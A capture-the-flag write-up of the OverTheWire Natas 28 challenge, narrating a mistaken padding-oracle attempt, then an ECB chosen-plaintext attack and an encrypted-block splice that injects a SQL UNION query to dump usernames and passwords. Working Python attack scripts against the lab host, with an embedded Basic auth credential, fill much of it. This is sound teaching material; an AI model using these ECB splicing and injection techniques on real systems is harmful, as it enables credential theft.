Natas 28: Getting It Wrong

I wanted to show someone a good example of a PHP unserialize vulnerability, and remembered that the natas challenges contained one. So I decided to work through all the challenges to find it, partly because I thought it would be fun and easy. Largely I was right: I cruised through them, found the unserialize one, and kept going, until I was stopped dead at Natas 28. The problem was not that it was exceptionally difficult; the problem was my reluctance to question my original assumptions about the challenge. I started the challenge, entered a search query, tampered with the query parameter of the URL I was redirected to, and was presented with:

Incorrect amount of PKCS#7 padding for blocksize

And I immediately thought “This is totally a Padding Oracle Attack”. I was certain of it. I then tested different input strings, examined the resulting ciphertext in the query parameter, and determined that the block size was 16 bytes. I now had all the information I needed to write a program to decrypt the ciphertext and reveal the password that I thought would be waiting in it. I used this convenient Padding Oracle API, and was able to quickly create the right program by switching out some lines in the example. I ended up with the following code:

from paddingoracle import BadPaddingException, PaddingOracle, xor
from base64 import b64encode, b64decode
from urllib import quote, unquote
import logging
import requests
import socket
import time

class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        somequery = quote(b64encode(data))
        #self.session.cookies['somecookie'] = somecookie

        while 1:
            try:
                #print "[*] Trying %s" % somequery
                headers = {"Authorization": "Basic bmF0YXMyODpKV3dSNDM4d2tnVHNOS0JiY0pvb3d5eXNkTTgyWWplRg=="}
                response = self.session.get('http://natas28.natas.labs.overthewire.org/search.php/?query='+somequery,
                        stream=False, timeout=5, verify=False, headers=headers)
                break
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...', self.wait)
                time.sleep(self.wait)
                continue

        self.history.append(response)

        # The server names the padding failure in the response body
        if "Incorrect amount of PKCS#7 padding for blocksize" in response.content:
            raise BadPaddingException

        logging.debug('No padding exception raised on %r', somequery)

if __name__ == '__main__':
    import logging
    import sys

    if not sys.argv[1:]:
        print 'Usage: %s <somequery value>' % (sys.argv[0], )
        sys.exit(1)

    logging.basicConfig(level=logging.DEBUG)

    encrypted_query = b64decode(unquote(sys.argv[1]))

    padbuster = PadBuster()

    query = padbuster.decrypt(encrypted_query, block_size=16, iv=bytearray(16))

    print('Decrypted somequery: %s => %r' % (sys.argv[1], query))

Had my assumptions been correct, this code would have taken the encrypted query parameter and returned the decrypted plaintext. So I ran the program and it resulted in… gibberish. That is, when it was able to finish at all, which for 16-byte blocks it generally wasn’t: it would fail to decrypt some bytes. This is where I screwed up by not rethinking my assumptions about the challenge. Instead I assumed there was something wrong with the code. And when I was convinced that what I wrote was right, I wondered if the open source code I was relying on was wrong, so I went through it to make sure it was doing the right thing (it was). I read and reread about padding oracle attacks. I wondered if it was actually an 8-byte block cipher and somehow the additional bytes were being doubled.
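For reference, the error message that sent me down this path is about PKCS#7 padding: the plaintext is extended with N bytes, each of value N, so that its length becomes a multiple of the block size. Here is a minimal sketch of what such a check typically looks like. It is written for Python 3 (unlike the Python 2 scripts in this post), the function names are my own, and it is an illustration rather than the server's actual code.

```python
def pkcs7_pad(data, block_size=16):
    """Append N bytes of value N so len(data) is a multiple of block_size."""
    n = block_size - len(data) % block_size
    return data + bytes([n]) * n


def pkcs7_unpad(data, block_size=16):
    """Strip PKCS#7 padding, raising ValueError if it is malformed."""
    if not data or len(data) % block_size:
        raise ValueError("length is not a multiple of the block size")
    n = data[-1]
    if n < 1 or n > block_size or data[-n:] != bytes([n]) * n:
        raise ValueError("incorrect PKCS#7 padding")
    return data[:-n]


padded = pkcs7_pad(b"hello")
print(len(padded), pkcs7_unpad(padded))
```

Note that a message whose length is already a multiple of the block size still gains a full block of padding, which matters when counting blocks later on.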

Eventually, still convinced it was a padding oracle attack (POA), I asked someone online what I was doing wrong. They told me to take another look at my assumptions about the cipher, particularly the block mode. I realized almost immediately that the block mode was actually ECB. If I hadn’t so blindly believed I was right in the beginning, I would have noticed that the test queries and resulting ciphertexts could not possibly be the result of CBC: in ECB each block is encrypted independently, so changing part of the query changes only the ciphertext blocks that cover it, whereas in CBC a change in one block alters every block after it.
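In hindsight, a quick look at the ciphertext blocks would have settled the mode question. Here is a minimal sketch of that kind of check in Python 3 (unlike the Python 2 scripts in this post). The helper names are mine, and the sample bytes are made up rather than real natas ciphertext.

```python
def split_blocks(data, block_size=16):
    """Cut a byte string into consecutive block_size-byte pieces."""
    return [data[i:i + block_size] for i in range(0, len(data), block_size)]


def repeated_blocks(ciphertext, block_size=16):
    """Return the set of blocks that appear more than once."""
    seen, repeats = set(), set()
    for block in split_blocks(ciphertext, block_size):
        if block in seen:
            repeats.add(block)
        seen.add(block)
    return repeats


def differing_blocks(ct_a, ct_b, block_size=16):
    """Indices of the blocks that differ between two ciphertexts."""
    pairs = zip(split_blocks(ct_a, block_size), split_blocks(ct_b, block_size))
    return [i for i, (a, b) in enumerate(pairs) if a != b]


# Made-up bytes standing in for two decoded ciphertexts (not real data).
head, tail = bytes(range(16)), bytes(range(16, 32))
sample_a = head + b"\xaa" * 16 + b"\xaa" * 16 + tail
sample_b = head + b"\xbb" * 16 + b"\xaa" * 16 + tail

print(len(repeated_blocks(sample_a)))        # how many distinct blocks repeat
print(differing_blocks(sample_a, sample_b))  # which block positions changed
```

Against a real target, the input would be the base64-decoded query parameter obtained after submitting a long run of one character. 64 identical bytes always cover at least three whole blocks, so ECB shows repeated ciphertext blocks where CBC almost certainly would not.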

Now that I knew it was ECB, I decided to use a chosen-plaintext attack, which would let me decrypt the portion of the plaintext that follows my query. I found another nice framework to carry this out, chosen-plaintext by EiNSeiN. Using it I produced the following code:

import requests
from urllib import quote, unquote
from chosen_plaintext import ChosenPlaintext

class Client(ChosenPlaintext):

	def __init__(self):
		ChosenPlaintext.__init__(self)
		#self.block_size = 16
		#self.plaintext_offset = 32
		
		return

	def ciphertext(self, plaintext):

		print "[*] Trying plaintext: %s" % plaintext.encode("hex")
		headers = {"Authorization": "Basic bmF0YXMyODpKV3dSNDM4d2tnVHNOS0JiY0pvb3d5eXNkTTgyWWplRg=="}
		resp = requests.post("http://natas28.natas.labs.overthewire.org/index.php", data={"query": plaintext}, headers=headers)

		# the encrypted query comes back base64-encoded in the redirect URL
		data = unquote(resp.url.split("query=")[1]).decode("base64")
		print "[*] Got ciphertext: %s" % data.encode("hex")
		
		return data

c = Client()
c.run()
print 'recovered', repr(c.plaintext)
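For context, the attack that the framework automates is usually called byte-at-a-time ECB decryption. Here is a minimal Python 3 sketch of the idea, run against a toy local oracle rather than the natas server. The key, the query prefix, and the secret suffix are all hypothetical. The "cipher" is a truncated HMAC standing in for a real block cipher, which is enough here because the attack only relies on equal plaintext blocks giving equal ciphertext blocks. The sketch also assumes the attacker already knows the prefix length.

```python
import hashlib
import hmac

BLOCK = 16
KEY = b"toy key"                                        # hypothetical
PREFIX = b"SELECT text FROM jokes WHERE text LIKE '%"   # hypothetical
SECRET_SUFFIX = b"%' LIMIT 10"                          # hypothetical


def toy_block(block):
    # Keyed and deterministic per block: a stand-in for ECB, not a real cipher.
    return hmac.new(KEY, block, hashlib.sha256).digest()[:BLOCK]


def oracle(user_input):
    """Encrypt PREFIX + input + SECRET_SUFFIX block by block, PKCS#7 padded."""
    data = PREFIX + user_input + SECRET_SUFFIX
    pad = BLOCK - len(data) % BLOCK
    data += bytes([pad]) * pad
    return b"".join(toy_block(data[i:i + BLOCK])
                    for i in range(0, len(data), BLOCK))


def recover_suffix(oracle, prefix_len):
    filler = b"A" * (-prefix_len % BLOCK)   # push our input to a block boundary
    aligned = prefix_len + len(filler)
    known = b""
    while True:
        # Leave exactly one unknown byte at the end of the target block.
        pad_len = BLOCK - 1 - len(known) % BLOCK
        start = aligned + (len(known) // BLOCK) * BLOCK
        stem = filler + b"A" * pad_len
        target = oracle(stem)[start:start + BLOCK]
        for c in range(256):
            guess = oracle(stem + known + bytes([c]))[start:start + BLOCK]
            if guess == target:
                known += bytes([c])
                break
        else:
            # Nothing matched: we have run into the padding, so stop here.
            return known[:-1] if known.endswith(b"\x01") else known


recovered = recover_suffix(oracle, len(PREFIX))
print(recovered)
```

Against the toy oracle this recovers the whole suffix, because nothing interferes with the guessed bytes on their way into the plaintext. The real server turned out to be less cooperative.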

But against the real server this script also failed, right after recovering a single byte of plaintext: “%”! So again I thought the code must be wrong. Eventually, however, I remembered that some query characters were being escaped, which breaks the chosen-plaintext attack at the first occurrence of one of those characters: the guess is escaped before it is encrypted, so it can never match the target block. So now I knew the next two bytes of the plaintext were % and an escaped character. After thinking about it for a little while I concluded that they were %' because that is the end of a SQL LIKE clause, something like “… WHERE joke_body LIKE '%{escaped_query}%' …”. This fit the behavior of the script and made sense with those characters.

So now I knew that the ciphertext was a SQL query encrypted with a block cipher in ECB mode. Since ECB encrypts each block separately, I could get the server to encrypt blocks containing valid SQL syntax and then insert them after the %' in the ciphertext to achieve SQL injection. (The injected SQL passes through the same escaping, so it has to avoid those characters.) The code below accomplishes this and prints out the password.

import requests
from urllib import quote, unquote
import re

from pwn import *

natas_url = "http://natas28.natas.labs.overthewire.org/index.php"
search_url = "http://natas28.natas.labs.overthewire.org/search.php/?query="

#authorization header
headers = {"Authorization": "Basic bmF0YXMyODpKV3dSNDM4d2tnVHNOS0JiY0pvb3d5eXNkTTgyWWplRg=="}

log.info("Retrieving first ciphertext")

#pad plaintext to ensure it takes up a full ciphertext block
plaintext = "A"*10 + "B"*14
resp = requests.post(natas_url, data={"query": plaintext}, headers=headers)

#get the raw bytes of the ciphertext
encoded_ciphertext = resp.url.split("query=")[1]
ciphertext = unquote(encoded_ciphertext).decode("base64")

#sql to inject into ciphertext query
new_sql = " UNION ALL SELECT concat(username,0x3A,password) FROM users #"
log.info("Appending query: %s" % new_sql)

#pad the injected SQL to a whole number of blocks; the ten A's fill out the
#third block, so the SQL starts on a block boundary at byte 48
plaintext = "A"*10 + new_sql + "B"*(16-(len(new_sql)%16))
offset = 48 + len(plaintext)-10

resp = requests.post(natas_url, data={"query": plaintext}, headers=headers)
encoded_new_ciphertext = resp.url.split("query=")[1]
new_ciphertext = unquote(encoded_new_ciphertext).decode("base64")
encrypted_sql = new_ciphertext[48:offset]

#splice the encrypted SQL in after the fourth block (bytes 48-63), which ends with the closing %'
final_ciphertext = ciphertext[:64]+encrypted_sql+ciphertext[64:]

resp = requests.get(search_url, params={"query":final_ciphertext.encode("base64")}, headers=headers)

log.info("Response: %s" % re.findall("<li>(.*?)</li>", resp.content)[0])
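The offsets in the script above are easier to follow on a toy model. The sketch below is Python 3, unlike the script, and replays the same splice offline against a stand-in server. The key, the query template, the escaping rule, and the small Feistel cipher are all made up for illustration and are not what natas uses. Only the injected SQL string is taken from the script.

```python
import hashlib

BLOCK = 16
KEY = b"toy key"                                        # hypothetical
PREFIX = b"SELECT text FROM jokes WHERE text LIKE '%"   # hypothetical
SUFFIX = b"%'"


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def round_fn(i, half):
    return hashlib.sha256(KEY + bytes([i]) + half).digest()[:BLOCK // 2]


def enc_block(block):
    # Four-round Feistel network: a toy invertible 16-byte block cipher.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, round_fn(i, r))
    return l + r


def dec_block(block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, round_fn(i, l)), l
    return l + r


def ecb(fn, data):
    # ECB mode: every block is processed on its own.
    return b"".join(fn(data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))


def server_encrypt(user_input):
    """Escape the input, embed it in the query, pad (PKCS#7) and encrypt."""
    escaped = user_input.replace(b"\\", b"\\\\").replace(b"'", b"\\'")
    sql = PREFIX + escaped + SUFFIX
    pad = BLOCK - len(sql) % BLOCK
    return ecb(enc_block, sql + bytes([pad]) * pad)


def server_decrypt(ciphertext):
    padded = ecb(dec_block, ciphertext)
    return padded[:-padded[-1]]


# Attacker side. Assumes the prefix length is already known.
filler = b"A" * (-len(PREFIX) % BLOCK)        # round the prefix up to a boundary
aligned = len(PREFIX) + len(filler)

# Base ciphertext: the block after the filler ends exactly with the closing %'
base = server_encrypt(filler + b"B" * (BLOCK - len(SUFFIX)))

# Donor ciphertext: our SQL, padded to whole blocks, starts on a block boundary
inject = b" UNION ALL SELECT concat(username,0x3A,password) FROM users #"
inject += b"B" * (-len(inject) % BLOCK)
donor = server_encrypt(filler + inject)
stolen = donor[aligned:aligned + len(inject)]

# Splice the stolen blocks in right after the block that closes the string
cut = aligned + BLOCK
forged = base[:cut] + stolen + base[cut:]
print(server_decrypt(forged).decode())
```

The printed query ends the LIKE string normally and then continues with the UNION, even though a quote typed into the search box would have been escaped. The server never sees the injected SQL inside a string literal, because its blocks were moved after encryption.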

This was a surprising and interesting challenge. It nicely demonstrates the weakness of block ciphers in ECB mode when the attacker can partially control the plaintext. It also showed me that I should never be so sure of my initial assessment that I am blind to new evidence.